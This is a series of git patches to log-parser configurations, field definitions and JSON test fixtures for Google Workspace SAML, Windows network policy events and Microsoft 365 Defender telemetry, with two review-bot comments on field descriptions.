"@timestamp": "2024-11-07T14:24:58.191000Z", + "cloud": { + "account": { + "id": "C000000000" + } + }, + "google": { + "report": { + "actor": { + "email": "John.doe@test.com" + }, + "saml": { + "application_name": "AWS Client VPN", + "initiator": "sp", + "status_code": "SUCCESS_URI" + } + } + }, + "network": { + 
"application": "saml" + }, + "related": { + "ip": [ + "8.6.15.1" + ], + "user": [ + "John.doe" + ] + }, + "source": { + "address": "8.6.15.1", + "ip": "8.6.15.1" + }, + "user": { + "domain": "test.com", + "email": "John.doe@test.com", + "id": "113844576558700000000", + "name": "John.doe" + } + } +} \ No newline at end of file From 49f05ead8e481396ef55f2e998ec6f1be38169d0 Mon Sep 17 00:00:00 2001 From: Sebastien Quioc Date: Wed, 13 Nov 2024 16:00:13 +0100 Subject: [PATCH 030/150] feat(Windows): copy CallingStationID as source ip or source mac and copy AuthenticationServer as destination domain --- Windows/windows/ingest/parser.yml | 13 +++++++++++++ Windows/windows/tests/Event_6272.json | 9 +++++++++ Windows/windows/tests/Event_6273.json | 9 +++++++++ Windows/windows/tests/process_6272.json | 13 +++++++++++++ 4 files changed, 44 insertions(+) diff --git a/Windows/windows/ingest/parser.yml b/Windows/windows/ingest/parser.yml index f0bd6640b..c34ff2684 100644 --- a/Windows/windows/ingest/parser.yml +++ b/Windows/windows/ingest/parser.yml @@ -164,6 +164,8 @@ pipeline: - name: dns_fields - name: action_target - name: destination + - name: set_network_policy_fields + filter: "{{ json.event.SourceName == 'Microsoft-Windows-Security-Auditing' and json.event.EventID in [6272, 6273, 6274, 6275, 6276, 6277, 6278, 6279, 6280]}}" - name: rule - name: finalize @@ -1150,6 +1152,17 @@ stages: source.address: "{{json_event.message.SourceAddr}}" filter: "{{json.event.SourceAddr | is_ipaddress}}" + set_network_policy_fields: + actions: + - set: + source.ip: "{{ json.event.CallingStationID }}" + filter: "{{json.event.CallingStationID | is_ipaddress}}" + - set: + source.mac: "{{ json.event.CallingStationID }}" + filter: "{{ final.source.ip == null }}" + - set: + destination.domain: "{{ json.event.AuthenticationServer }}" + rule: actions: - set: diff --git a/Windows/windows/tests/Event_6272.json b/Windows/windows/tests/Event_6272.json index 4a3212af2..20213504d 100644 
--- a/Windows/windows/tests/Event_6272.json +++ b/Windows/windows/tests/Event_6272.json @@ -42,6 +42,14 @@ "record_id": 1674356873, "type": "Security" }, + "destination": { + "address": "auth.example.org", + "domain": "auth.example.org", + "registered_domain": "example.org", + "size_in_char": 16, + "subdomain": "auth", + "top_level_domain": "org" + }, "host": { "hostname": "hostname.example.org", "name": "hostname.example.org" @@ -63,6 +71,7 @@ }, "related": { "hosts": [ + "auth.example.org", "hostname.example.org" ], "user": [ diff --git a/Windows/windows/tests/Event_6273.json b/Windows/windows/tests/Event_6273.json index 8ad5a2226..118cf2445 100644 --- a/Windows/windows/tests/Event_6273.json +++ b/Windows/windows/tests/Event_6273.json @@ -42,6 +42,14 @@ "record_id": 783949626, "type": "Security" }, + "destination": { + "address": "auth.example.org", + "domain": "auth.example.org", + "registered_domain": "example.org", + "size_in_char": 16, + "subdomain": "auth", + "top_level_domain": "org" + }, "host": { "hostname": "hostname.example.org", "name": "hostname.example.org" @@ -63,6 +71,7 @@ }, "related": { "hosts": [ + "auth.example.org", "hostname.example.org" ], "user": [ diff --git a/Windows/windows/tests/process_6272.json b/Windows/windows/tests/process_6272.json index af1d9fe1d..3135f15c9 100644 --- a/Windows/windows/tests/process_6272.json +++ b/Windows/windows/tests/process_6272.json @@ -42,6 +42,11 @@ "record_id": 2324634, "type": "Security" }, + "destination": { + "address": "1.2.3.4", + "domain": "1.2.3.4", + "size_in_char": 7 + }, "host": { "hostname": "test", "name": "test" @@ -63,12 +68,20 @@ }, "related": { "hosts": [ + "1.2.3.4", "test" ], + "ip": [ + "10.24.25.25" + ], "user": [ "testUser" ] }, + "source": { + "address": "10.24.25.25", + "ip": "10.24.25.25" + }, "user": { "domain": "NT01", "id": "S-1-5-21-1111111111-111111111-1111111111-1111", From 7c47ee4ee8a16e39ece3021bd65f19304c722bc8 Mon Sep 17 00:00:00 2001 
From: TOUFIKI Zakarya Date: Wed, 13 Nov 2024 16:07:01 +0100 Subject: [PATCH 031/150] Apply linter --- Google Cloud/google-report/_meta/fields.yml | 24 +++++++++---------- Google Cloud/google-report/ingest/parser.yml | 6 ++--- .../tests/test_saml_login_success.json | 4 ++-- .../tests/test_saml_login_success_1.json | 4 ++-- 4 files changed, 19 insertions(+), 19 deletions(-) diff --git a/Google Cloud/google-report/_meta/fields.yml b/Google Cloud/google-report/_meta/fields.yml index ad86f9169..ad9d8d0a7 100644 --- a/Google Cloud/google-report/_meta/fields.yml +++ b/Google Cloud/google-report/_meta/fields.yml @@ -33,14 +33,14 @@ google.report.parameters.visibility: name: google.report.parameters.visibility type: keyword -google.report.token.app_name: - description: Token authorization application name - name: google.report.token.app_name +google.report.saml.application_name: + description: Saml SP application name + name: google.report.saml.application_name type: keyword -google.report.token.type: - description: Token type - name: google.report.token.type +google.report.saml.initiator: + description: SAML requester of saml authentication + name: google.report.saml.initiator type: keyword google.report.saml.status_code: @@ -48,12 +48,12 @@ google.report.saml.status_code: name: google.report.saml.status_code type: keyword -google.report.saml.initiator: - description: SAML requester of saml authentication - name: google.report.saml.initiator +google.report.token.app_name: + description: Token authorization application name + name: google.report.token.app_name type: keyword -google.report.saml.application_name: - description: Saml SP application name - name: google.report.saml.application_name +google.report.token.type: + description: Token type + name: google.report.token.type type: keyword diff --git a/Google Cloud/google-report/ingest/parser.yml b/Google Cloud/google-report/ingest/parser.yml index e00c5ee79..3a0fce88f 100644 
--- a/Google Cloud/google-report/ingest/parser.yml +++ b/Google Cloud/google-report/ingest/parser.yml @@ -269,12 +269,12 @@ stages: google.report.saml.status_code: '{% for param in json_event.message.events[0].parameters %}{% if param.name == "saml_status_code" %}{{param.value}}{% endif %}{% endfor %}' google.report.saml.initiator: '{% for param in json_event.message.events[0].parameters %}{% if param.name == "initiated_by" %}{{param.value}}{% endif %}{% endfor %}' google.report.saml.application_name: '{% for param in json_event.message.events[0].parameters %}{% if param.name == "application_name" %}{{param.value}}{% endif %}{% endfor %}' - + - set: event.type: ["allowed"] filter: '{{ json_event.message.events[0].name == "login_success"}}' - + - set: event.type: ["denied"] event.reason: '{% for param in json_event.message.events[0].parameters %}{% if param.name == "failure_type" %}{{param.value}}{% endif %}{% endfor %}' - filter: '{{ json_event.message.events[0].name == "login_failure"}}' + filter: '{{ json_event.message.events[0].name == "login_failure"}}' diff --git a/Google Cloud/google-report/tests/test_saml_login_success.json b/Google Cloud/google-report/tests/test_saml_login_success.json index a96c1fab6..8a9785816 100644 --- a/Google Cloud/google-report/tests/test_saml_login_success.json +++ b/Google Cloud/google-report/tests/test_saml_login_success.json 
@@ -1,12 +1,12 @@ { "input": { + "message": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2024-11-07T14:26:15.515Z\",\"uniqueQualifier\":\"4091348940000000\",\"applicationName\":\"saml\",\"customerId\":\"C00000000\"},\"etag\":\"\\\"M7TKrOH_7SmMcgNyv3m2zFZr0EiRGbeupcJ_yRi3fFQ\\\"\",\"actor\":{\"email\":\"John.doe@test.com\",\"profileId\":\"10344515534360000000\"},\"ipAddress\":\"2.1.3.2\",\"events\":[{\"type\":\"login\",\"name\":\"login_success\",\"parameters\":[{\"name\":\"orgunit_path\",\"value\":\"/test/implementation\"},{\"name\":\"initiated_by\",\"value\":\"sp\"},{\"name\":\"application_name\",\"value\":\"AWS\"},{\"name\":\"saml_status_code\",\"value\":\"SUCCESS_URI\"}]}]}", "sekoiaio": { "intake": { "dialect": "Google Report", "dialect_uuid": "04d36706-ee4a-419b-906d-f92f3a46bcdd" } - }, - "message": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2024-11-07T14:26:15.515Z\",\"uniqueQualifier\":\"4091348940000000\",\"applicationName\":\"saml\",\"customerId\":\"C00000000\"},\"etag\":\"\\\"M7TKrOH_7SmMcgNyv3m2zFZr0EiRGbeupcJ_yRi3fFQ\\\"\",\"actor\":{\"email\":\"John.doe@test.com\",\"profileId\":\"10344515534360000000\"},\"ipAddress\":\"2.1.3.2\",\"events\":[{\"type\":\"login\",\"name\":\"login_success\",\"parameters\":[{\"name\":\"orgunit_path\",\"value\":\"/test/implementation\"},{\"name\":\"initiated_by\",\"value\":\"sp\"},{\"name\":\"application_name\",\"value\":\"AWS\"},{\"name\":\"saml_status_code\",\"value\":\"SUCCESS_URI\"}]}]}" + } }, "expected": { "message": 
"{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2024-11-07T14:26:15.515Z\",\"uniqueQualifier\":\"4091348940000000\",\"applicationName\":\"saml\",\"customerId\":\"C00000000\"},\"etag\":\"\\\"M7TKrOH_7SmMcgNyv3m2zFZr0EiRGbeupcJ_yRi3fFQ\\\"\",\"actor\":{\"email\":\"John.doe@test.com\",\"profileId\":\"10344515534360000000\"},\"ipAddress\":\"2.1.3.2\",\"events\":[{\"type\":\"login\",\"name\":\"login_success\",\"parameters\":[{\"name\":\"orgunit_path\",\"value\":\"/test/implementation\"},{\"name\":\"initiated_by\",\"value\":\"sp\"},{\"name\":\"application_name\",\"value\":\"AWS\"},{\"name\":\"saml_status_code\",\"value\":\"SUCCESS_URI\"}]}]}", diff --git a/Google Cloud/google-report/tests/test_saml_login_success_1.json b/Google Cloud/google-report/tests/test_saml_login_success_1.json index 94e5f299f..de8e102d7 100644 --- a/Google Cloud/google-report/tests/test_saml_login_success_1.json +++ b/Google Cloud/google-report/tests/test_saml_login_success_1.json 
@@ -1,12 +1,12 @@ { "input": { + "message": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2024-11-07T14:24:58.191Z\",\"uniqueQualifier\":\"-318965716033600000\",\"applicationName\":\"saml\",\"customerId\":\"C000000000\"},\"etag\":\"\\\"M7TKrOH_7SmMcgNyv3m2zFZr0EiRGbeupcJ_yRi3fFQ\\\"\",\"actor\":{\"email\":\"John.doe@test.com\",\"profileId\":\"113844576558700000000\"},\"ipAddress\":\"8.6.15.1\",\"events\":[{\"type\":\"login\",\"name\":\"login_success\",\"parameters\":[{\"name\":\"orgunit_path\",\"value\":\"/test/dev\"},{\"name\":\"initiated_by\",\"value\":\"sp\"},{\"name\":\"application_name\",\"value\":\"AWS Client VPN\"},{\"name\":\"saml_status_code\",\"value\":\"SUCCESS_URI\"}]}]}", "sekoiaio": { "intake": { "dialect": "Google Report", "dialect_uuid": "04d36706-ee4a-419b-906d-f92f3a46bcdd" } - }, - "message": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2024-11-07T14:24:58.191Z\",\"uniqueQualifier\":\"-318965716033600000\",\"applicationName\":\"saml\",\"customerId\":\"C000000000\"},\"etag\":\"\\\"M7TKrOH_7SmMcgNyv3m2zFZr0EiRGbeupcJ_yRi3fFQ\\\"\",\"actor\":{\"email\":\"John.doe@test.com\",\"profileId\":\"113844576558700000000\"},\"ipAddress\":\"8.6.15.1\",\"events\":[{\"type\":\"login\",\"name\":\"login_success\",\"parameters\":[{\"name\":\"orgunit_path\",\"value\":\"/test/dev\"},{\"name\":\"initiated_by\",\"value\":\"sp\"},{\"name\":\"application_name\",\"value\":\"AWS Client VPN\"},{\"name\":\"saml_status_code\",\"value\":\"SUCCESS_URI\"}]}]}" + } }, "expected": { "message": 
"{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2024-11-07T14:24:58.191Z\",\"uniqueQualifier\":\"-318965716033600000\",\"applicationName\":\"saml\",\"customerId\":\"C000000000\"},\"etag\":\"\\\"M7TKrOH_7SmMcgNyv3m2zFZr0EiRGbeupcJ_yRi3fFQ\\\"\",\"actor\":{\"email\":\"John.doe@test.com\",\"profileId\":\"113844576558700000000\"},\"ipAddress\":\"8.6.15.1\",\"events\":[{\"type\":\"login\",\"name\":\"login_success\",\"parameters\":[{\"name\":\"orgunit_path\",\"value\":\"/test/dev\"},{\"name\":\"initiated_by\",\"value\":\"sp\"},{\"name\":\"application_name\",\"value\":\"AWS Client VPN\"},{\"name\":\"saml_status_code\",\"value\":\"SUCCESS_URI\"}]}]}", From 462382e15fa0254cb24676a97571ed0edadafc82 Mon Sep 17 00:00:00 2001 
From: LenaigKaliou Date: Wed, 13 Nov 2024 16:14:34 +0100 Subject: [PATCH 032/150] Fix/Microsoft 365 Defender: Fix on process* fields --- .../microsoft-365-defender/_meta/fields.yml | 264 ++++++++++-------- .../microsoft-365-defender/ingest/parser.yml | 150 +++++++--- .../tests/test_device_event.json | 22 +- ...test_device_event_sensitive_file_read.json | 100 +++++++ ...vents_2.json => test_device_events_2.json} | 13 +- ...test_device_events_get_clipboard_data.json | 83 ++++++ ...test_device_events_powershell_command.json | 83 ++++++ ..._device_events_shell_link_create_file.json | 103 +++++++ .../tests/test_device_file_event.json | 24 +- .../tests/test_device_file_event_02.json | 109 ++++++++ .../tests/test_device_image_load_event.json | 10 +- .../tests/test_device_logon_events.json | 6 +- .../tests/test_device_network_events.json | 26 +- .../tests/test_device_process_created.json | 8 +- .../tests/test_device_process_events.json | 83 +++--- .../tests/test_device_process_events_2.json | 127 ++++++--- .../tests/test_device_registry_events.json | 24 +- .../test_devices_events_script_content.json | 13 +- .../tests/test_email_events.json | 22 +- .../tests/test_email_post_delivery.json | 2 +- .../tests/test_email_url_info.json | 22 +- .../tests/test_identity_directory.json | 22 +- .../tests/test_identity_info.json | 22 +- .../tests/test_identity_info_2.json | 2 +- .../tests/test_identity_logon.json | 22 +- .../tests/test_identity_query.json | 22 +- .../tests/test_local_ip.json | 22 +- .../tests/test_process_error.json | 54 ++-- 28 files changed, 1068 insertions(+), 392 deletions(-) create mode 100644 Microsoft/microsoft-365-defender/tests/test_device_event_sensitive_file_read.json rename Microsoft/microsoft-365-defender/tests/{test_deivce_events_2.json => test_device_events_2.json} (98%) create mode 100644 Microsoft/microsoft-365-defender/tests/test_device_events_get_clipboard_data.json create mode 100644 
Microsoft/microsoft-365-defender/tests/test_device_events_powershell_command.json create mode 100644 Microsoft/microsoft-365-defender/tests/test_device_events_shell_link_create_file.json create mode 100644 Microsoft/microsoft-365-defender/tests/test_device_file_event_02.json diff --git a/Microsoft/microsoft-365-defender/_meta/fields.yml b/Microsoft/microsoft-365-defender/_meta/fields.yml index f69ef372d..0e6154ccd 100644 --- a/Microsoft/microsoft-365-defender/_meta/fields.yml +++ b/Microsoft/microsoft-365-defender/_meta/fields.yml 
@@ -133,78 +133,6 @@ action.properties.ISP: name: action.properties.ISP type: keyword -action.properties.InitiatingProcessAccountObjectId: - description: Azure AD object ID of the user account that ran the process responsible - for the event - name: action.properties.InitiatingProcessAccountObjectId - type: keyword - -action.properties.InitiatingProcessCommandLine: - description: Process commande Line that initiated the event - name: action.properties.InitiatingProcessCommandLine - type: keyword - -action.properties.InitiatingProcessFileSize: - description: Size of the process (image file) that initiated the event - name: action.properties.InitiatingProcessFileSize - type: long - -action.properties.InitiatingProcessIntegrityLevel: - description: Integrity level of the process that initiated the event. Windows assigns - integrity levels to processes based on certain characteristics, such as if they - were launched from an internet download. These integrity levels influence permissions - to resources - name: action.properties.InitiatingProcessIntegrityLevel - type: keyword - -action.properties.InitiatingProcessLogonId: - description: Identifier for a logon session of the process that initiated the event. - This identifier is unique on the same machine only between restarts. 
- name: action.properties.InitiatingProcessLogonId - type: keyword - -action.properties.InitiatingProcessTokenElevation: - description: Token type indicating the presence or absence of User Access Control - (UAC) privilege elevation applied to the process that initiated the event - name: action.properties.InitiatingProcessTokenElevation - type: keyword - -action.properties.InitiatingProcessVersionInfoCompanyName: - description: Company name from the version information of the process (image file) - responsible for the event - name: action.properties.InitiatingProcessVersionInfoCompanyName - type: keyword - -action.properties.InitiatingProcessVersionInfoFileDescription: - description: Description from the version information of the process (image file) - responsible for the event - name: action.properties.InitiatingProcessVersionInfoFileDescription - type: keyword - -action.properties.InitiatingProcessVersionInfoInternalFileName: - description: Internal file name from the version information of the process (image - file) responsible for the event - name: action.properties.InitiatingProcessVersionInfoInternalFileName - type: keyword - -action.properties.InitiatingProcessVersionInfoOriginalFileName: - description: Original file name from the version information of the process (image - file) responsible for the event - name: action.properties.InitiatingProcessVersionInfoOriginalFileName - type: keyword - -action.properties.InitiatingProcessVersionInfoProductName: - description: Product name from the version information of the process (image file) - responsible for the event - name: action.properties.InitiatingProcessVersionInfoProductName - type: keyword - -action.properties.InitiatingProcessVersionInfoProductVersion: - description: Product version from the version information of the process (image - file) responsible for the event - name: action.properties.InitiatingProcessVersionInfoProductVersion - type: keyword - action.properties.IsAdminOperation: description: 
Indicates whether the activity was performed by an administrator name: action.properties.IsAdminOperation 
@@ -353,51 +281,6 @@ action.properties.PreviousRegistryValueName: name: action.properties.PreviousRegistryValueName type: keyword -action.properties.ProcessIntegrityLevel: - description: Integrity level of the newly created process. Windows assigns integrity - levels to processes based on certain characteristics, such as if they were launched - from an internet downloaded. These integrity levels influence permissions to resources - name: action.properties.ProcessIntegrityLevel - type: keyword - -action.properties.ProcessTokenElevation: - description: Token type indicating the presence or absence of User Access Control - (UAC) privilege elevation applied to the newly created process - name: action.properties.ProcessTokenElevation - type: keyword - -action.properties.ProcessVersionInfoCompanyName: - description: Company name from the version information of the newly created process - name: action.properties.ProcessVersionInfoCompanyName - type: keyword - -action.properties.ProcessVersionInfoFileDescription: - description: Description from the version information of the newly created process - name: action.properties.ProcessVersionInfoFileDescription - type: keyword - -action.properties.ProcessVersionInfoInternalFileName: - description: Internal file name from the version information of the newly created - process - name: action.properties.ProcessVersionInfoInternalFileName - type: keyword - -action.properties.ProcessVersionInfoOriginalFileName: - description: Original file name from the version information of the newly created - process - name: action.properties.ProcessVersionInfoOriginalFileName - type: keyword - -action.properties.ProcessVersionInfoProductName: - description: Product name from the version information of the newly created process - name: action.properties.ProcessVersionInfoProductName - type: keyword - -action.properties.ProcessVersionInfoProductVersion: - description: Product version from the version information of the newly created process - name: 
action.properties.ProcessVersionInfoProductVersion - type: keyword - action.properties.Query: description: String used to run the query name: action.properties.Query 
@@ -529,6 +412,143 @@ action.properties.UserLevelPolicy: name: action.properties.UserLevelPolicy type: keyword +action.properties.process.AccountObjectId: + description: Azure AD object ID of the user account that ran the process responsible + for the event + name: action.properties.process.AccountObjectId + type: keyword + +action.properties.process.CommandLine: + description: Process commande Line that initiated the event + name: action.properties.process.CommandLine + type: keyword + +action.properties.process.FileSize: + description: Size of the process (image file) that initiated the event + name: action.properties.process.FileSize + type: long + +action.properties.process.IntegrityLevel: + description: Integrity level of the newly created process. Windows assigns integrity + levels to processes based on certain characteristics, such as if they were launched + from an internet downloaded. These integrity levels influence permissions to resources + name: action.properties.process.IntegrityLevel + type: keyword + +action.properties.process.LogonId: + description: Identifier for a logon session of the process that initiated the event. + This identifier is unique on the same machine only between restarts. 
+ name: action.properties.process.LogonId + type: keyword + +action.properties.process.TokenElevation: + description: Token type indicating the presence or absence of User Access Control + (UAC) privilege elevation applied to the newly created process + name: action.properties.process.TokenElevation + type: keyword + +action.properties.process.VersionInfoCompanyName: + description: Company name from the version information of the newly created process + name: action.properties.process.VersionInfoCompanyName + type: keyword + +action.properties.process.VersionInfoFileDescription: + description: Description from the version information of the newly created process + name: action.properties.process.VersionInfoFileDescription + type: keyword + +action.properties.process.VersionInfoInternalFileName: + description: Internal file name from the version information of the newly created + process + name: action.properties.process.VersionInfoInternalFileName + type: keyword + +action.properties.process.VersionInfoOriginalFileName: + description: Original file name from the version information of the newly created + process + name: action.properties.process.VersionInfoOriginalFileName + type: keyword + +action.properties.process.VersionInfoProductName: + description: Product name from the version information of the newly created process + name: action.properties.process.VersionInfoProductName + type: keyword + +action.properties.process.VersionInfoProductVersion: + description: Product version from the version information of the newly created process + name: action.properties.process.VersionInfoProductVersion + type: keyword + +action.properties.process.parent.AccountObjectId: + description: Azure AD object ID of the user account that ran the parent process + responsible for the event + name: action.properties.process.parent.AccountObjectId + type: keyword + +action.properties.process.parent.CommandLine: + description: Parent process commande Line that initiated the event + 
name: action.properties.process.parent.CommandLine + type: keyword + +action.properties.process.parent.FileSize: + description: Size of the parent process (image file) that initiated the event + name: action.properties.process.parent.FileSize + type: long + +action.properties.process.parent.IntegrityLevel: + description: Integrity level of the parent process that initiated the event. Windows + assigns integrity levels to processes based on certain characteristics, such as + if they were launched from an internet download. These integrity levels influence + permissions to resources + name: action.properties.process.parent.IntegrityLevel + type: keyword + +action.properties.process.parent.LogonId: + description: Identifier for a logon session of the parent process that initiated + the event. This identifier is unique on the same machine only between restarts. + name: action.properties.process.parent.LogonId + type: keyword + +action.properties.process.parent.TokenElevation: + description: Token type indicating the presence or absence of User Access Control + (UAC) privilege elevation applied to the parent process that initiated the event + name: action.properties.process.parent.TokenElevation + type: keyword + +action.properties.process.parent.VersionInfoCompanyName: + description: Company name from the version information of the parent process (image + file) responsible for the event + name: action.properties.process.parent.VersionInfoCompanyName + type: keyword + +action.properties.process.parent.VersionInfoFileDescription: + description: Description from the version information of the parent process (image + file) responsible for the event + name: action.properties.process.parent.VersionInfoFileDescription + type: keyword + +action.properties.process.parent.VersionInfoInternalFileName: + description: Internal file name from the version information of the parent process + (image file) responsible for the event + name: 
action.properties.process.parent.VersionInfoInternalFileName + type: keyword + +action.properties.process.parent.VersionInfoOriginalFileName: + description: '' + name: action.properties.process.parent.VersionInfoOriginalFileName + type: keyword + +action.properties.process.parent.VersionInfoProductName: + description: '' + name: action.properties.process.parent.VersionInfoProductName + type: keyword + +action.properties.process.parent.VersionInfoProductVersion: + description: Product version from the version information of the parent process + (image file) responsible for the event + name: action.properties.process.parent.VersionInfoProductVersion + type: keyword + email.direction: description: The direction of the message based on the sending and receiving domains name: email.direction @@ -821,6 +841,16 @@ microsoft.defender.threat.types: name: microsoft.defender.threat.types type: keyword +process.parent.user.domain: + description: '' + name: process.parent.user.domain + type: keyword + +process.parent.user.email: + description: '' + name: process.parent.user.email + type: keyword + process.user.domain: description: Domain of the account that ran the process responsible for the event name: process.user.domain diff --git a/Microsoft/microsoft-365-defender/ingest/parser.yml b/Microsoft/microsoft-365-defender/ingest/parser.yml index 2a8b6655f..f60d9b6f0 100644 --- a/Microsoft/microsoft-365-defender/ingest/parser.yml +++ b/Microsoft/microsoft-365-defender/ingest/parser.yml 
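Review bot: Two of the new declarations ship with an empty `description: ''` — `action.properties.process.parent.VersionInfoOriginalFileName` and `action.properties.process.parent.VersionInfoProductName` — while every sibling is documented; the text from the deleted `InitiatingProcessVersionInfo*` entries fits verbatim, e.g. `description: Original file name from the version information of the parent process (image file) responsible for the event`. The copied descriptions also keep the typo `commande` in `action.properties.process.CommandLine` and `action.properties.process.parent.CommandLine`. Several `action.properties.process.*` descriptions disagree with each other about which process they describe (`IntegrityLevel`/`TokenElevation` say "newly created process", `LogonId`/`FileSize`/`CommandLine` say "process that initiated the event"); since parser.yml's `set_process_events` fills all of them from `InitiatingProcess*` for non-process-creation events and `set_process_deviceprocess_events` from `Process*` for process creation, a one-line note such as `# the created process for DeviceProcessEvents, the initiating process otherwise` on each would spare the next reader a trip to the parser.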
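Review bot: `process.parent.user.domain` and `process.parent.user.email` are declared with `description: ''`; parser.yml sets them from `InitiatingProcessAccountDomain` and `InitiatingProcessAccountUpn` in the DeviceProcessEvents path, so the existing `process.user.domain` wording can be mirrored: `description: Domain of the account that ran the parent process responsible for the event` and `description: User principal name of the account that ran the parent process responsible for the event`. `process.parent.user.name` and `process.parent.user.id` are set by the same stage but are not declared here; if this file is meant to list only non-ECS fields that is fine, otherwise they are missing too.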
@@ -40,6 +40,10 @@ pipeline: input_field: "{{json_event.message.properties.RawEventData.Data}}" output_field: "data" - name: set_common_fields + - name: set_process_events + filter: '{{json_event.message.get("category") not in ["AdvancedHunting-DeviceProcessEvents", "AdvancedHunting-DeviceEvents"] or (json_event.message.get("category") == "AdvancedHunting-DeviceEvents" and json_event.message.properties.get("ActionType").lower() in ["antivirusscancancelled", "antivirusscancompleted", "antivirusscanfailed", "appcontrolpolicyapplied", "appguardbrowsetourl", "appguardcreatecontainer", "appguardlaunchedwithurl", "appguardresumecontainer", "auditpolicymodification", "browserlaunchedtoopenurl", "clrunbackedmoduleloaded", "controlflowguardviolation", "createremotethreadapicall", "dnsqueryresponse", "dpapiaccessed", "exploitguardacgenforced", "exploitguardwin32systemcallblocked", "getasynckeystateapicall", "getclipboarddata", "ldapsearch", "memoryremoteprotect", "namedpipeevent", "ntallocatevirtualmemoryapicall", "ntallocatevirtualmemoryremoteapicall", "ntmapviewofsectionremoteapicall", "ntprotectvirtualmemoryapicall","otheralertrelatedactivity", "powershellcommand", "processprimarytokenmodified", "screenshottaken", "smartscreenurlwarning", "writetolsassprocessmemory"])}}' + - name: set_process_deviceprocess_events + filter: '{{json_event.message.get("category") == "AdvancedHunting-DeviceProcessEvents" or (json_event.message.get("category") == "AdvancedHunting-DeviceEvents" and json_event.message.properties.get("ActionType").lower() not in ["antivirusscancancelled", "antivirusscancompleted", "antivirusscanfailed", "appcontrolpolicyapplied", "appguardbrowsetourl", "appguardcreatecontainer", "appguardlaunchedwithurl", "appguardresumecontainer", "auditpolicymodification", "browserlaunchedtoopenurl", "clrunbackedmoduleloaded", "controlflowguardviolation", "createremotethreadapicall", "dnsqueryresponse", "dpapiaccessed", "exploitguardacgenforced", 
"exploitguardwin32systemcallblocked", "getasynckeystateapicall", "getclipboarddata", "ldapsearch", "memoryremoteprotect", "namedpipeevent", "ntallocatevirtualmemoryapicall", "ntallocatevirtualmemoryremoteapicall", "ntmapviewofsectionremoteapicall", "ntprotectvirtualmemoryapicall","otheralertrelatedactivity", "powershellcommand", "processprimarytokenmodified", "screenshottaken", "smartscreenurlwarning", "writetolsassprocessmemory"])}}' - name: set_alert_evidence_fields filter: '{{json_event.message.get("category") == "AdvancedHunting-AlertEvidence"}}' - name: set_alert_info_fields 
@@ -126,22 +130,6 @@ stages: host.os.full: "{{json_event.message.properties.OSPlatform}}" host.os.version: "{{json_event.message.properties.OSVersion}}" host.type: "{{json_event.message.properties.DeviceType}}" - process.hash.md5: "{{json_event.message.InitiatingProcessMD5 or json_event.message.properties.InitiatingProcessMD5}}" - process.hash.sha1: "{{json_event.message.InitiatingProcessSHA1 or json_event.message.properties.InitiatingProcessSHA1}}" - process.hash.sha256: "{{json_event.message.InitiatingProcessSHA256 or json_event.message.properties.InitiatingProcessSHA256}}" - process.pid: "{{json_event.message.properties.ProcessId or json_event.message.properties.InitiatingProcessId}}" - process.start: "{{json_event.message.properties.ProcessCreationTime or json_event.message.properties.InitiatingProcessCreationTime}}" - process.name: "{{json_event.message.properties.InitiatingProcessFileName | basename}}" - process.command_line: "{{json_event.message.properties.ProcessCommandLine or json_event.message.properties.InitiatingProcessCommandLine}}" - process.executable: "{{json_event.message.properties.InitiatingProcessFolderPath}}" - process.working_directory: "{{json_event.message.properties.InitiatingProcessFolderPath | dirname}}" - process.user.domain: "{{json_event.message.properties.InitiatingProcessAccountDomain}}" - process.user.name: "{{json_event.message.properties.InitiatingProcessAccountName}}" - process.user.id: "{{json_event.message.properties.InitiatingProcessAccountSid}}" - process.user.email: "{{json_event.message.properties.InitiatingProcessAccountUpn}}" - process.parent.pid: "{{json_event.message.properties.InitiatingProcessParentId}}" - process.parent.name: "{{json_event.message.properties.InitiatingProcessParentFileName | basename}}" - process.parent.start: "{{json_event.message.properties.InitiatingProcessParentCreationTime}}" registry.data.type: "{{json_event.message.properties.RegistryValueType}}" registry.key: 
"{{json_event.message.properties.RegistryKey}}" registry.value: "{{json_event.message.properties.RegistryValueName}}" 
@@ -166,18 +154,6 @@ stages: action.properties.FileOriginReferrerUrl: "{{json_event.message.properties.FileOriginReferrerUrl}}" action.properties.FileOriginUrl: "{{json_event.message.properties.FileOriginUrl}}" action.properties.ISP: "{{json_event.message.properties.ISP or json_event.message.properties.Isp}}" - action.properties.InitiatingProcessAccountObjectId: "{{json_event.message.properties.InitiatingProcessAccountObjectId}}" - action.properties.InitiatingProcessFileSize: "{{json_event.message.properties.InitiatingProcessFileSize}}" - action.properties.InitiatingProcessIntegrityLevel: "{{json_event.message.properties.InitiatingProcessIntegrityLevel}}" - action.properties.InitiatingProcessLogonId: "{{json_event.message.properties.InitiatingProcessLogonId}}" - action.properties.InitiatingProcessTokenElevation: "{{json_event.message.properties.InitiatingProcessTokenElevation}}" - action.properties.InitiatingProcessCommandLine: "{{json_event.message.properties.InitiatingProcessCommandLine}}" - action.properties.InitiatingProcessVersionInfoCompanyName: "{{json_event.message.properties.InitiatingProcessVersionInfoCompanyName}}" - action.properties.InitiatingProcessVersionInfoFileDescription: "{{json_event.message.properties.InitiatingProcessVersionInfoFileDescription}}" - action.properties.InitiatingProcessVersionInfoInternalFileName: "{{json_event.message.properties.InitiatingProcessVersionInfoInternalFileName}}" - action.properties.InitiatingProcessVersionInfoOriginalFileName: "{{json_event.message.properties.InitiatingProcessVersionInfoOriginalFileName}}" - action.properties.InitiatingProcessVersionInfoProductName: "{{json_event.message.properties.InitiatingProcessVersionInfoProductName}}" - action.properties.InitiatingProcessVersionInfoProductVersion: "{{json_event.message.properties.InitiatingProcessVersionInfoProductVersion}}" action.properties.LocalIPType: "{{json_event.message.properties.LocalIPType}}" action.properties.Location: 
